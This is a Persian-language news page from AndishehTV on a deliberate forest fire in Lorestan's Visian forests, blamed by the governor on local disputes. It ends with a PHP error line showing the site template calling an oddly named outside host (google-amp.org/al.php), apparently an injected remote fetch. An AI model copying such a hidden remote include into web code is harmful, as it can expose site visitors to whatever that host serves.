Monday 26 October 2020 / دوشنبه 5 آبان 1399

جستجو

P7a

AndishehTV

ATV Frequenter

lorestan visian forest in fire

در اثر اختلافات محلی جنگل‌های ویسیان در استان لرستان آتش گرفته بود. این آتش مهار شد. اما بار دیگر جنگل‌ها دچار حریق شدند. مسئولان می‌گویند آتش‌سوزی عمدی‌ست.
از ظهر جمعه ۸ مرداد جنگل‌های ویسیان در شهرستان دوره چگنی در استان لرستان دچار حریق شد. روز گذشته در اثر آتش‌سوزی ۲۰۰ هکتار از جنگل‌های ویسیان از بین رفت. امروز مجدداً آتش‌سوزی در همان مکان اتفاق افتاده است.
فرماندار دوره چگنی و مدیرکل منابع طبیعی استان لرستان به محل آتش‌سوزی رفته‌اند و عملیات اطفاء حریق آغاز شده است.


قدرت‌الله ترابی‌نژاد، فرماندار دوره‌ چگنی به خبرگزاری دانشجویان ایران (ایسنا) گفته است که آتش‌سوزی عمدی بوده و در اثر اختلافات محلی روی داده است.
جنگل‌های استان‌های زاگرسی در ایران ۵/۸ میلیون هکتار مساحت دارد. از این میان در ۱/۲ میلیون هکتار جنگل در استان لرستان قرار دارد. این جنگل‌ها اما در اثر چرای بی‌رویه دام، تعرض به عرصه‌های طبیعی و تغییر کاربری‌ها، خسارات خشکسالی و ریزگردها و اجرای پروژه‌های عمرانی غیرکارشناسی در معرض نابودی قرار گرفته‌اند


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311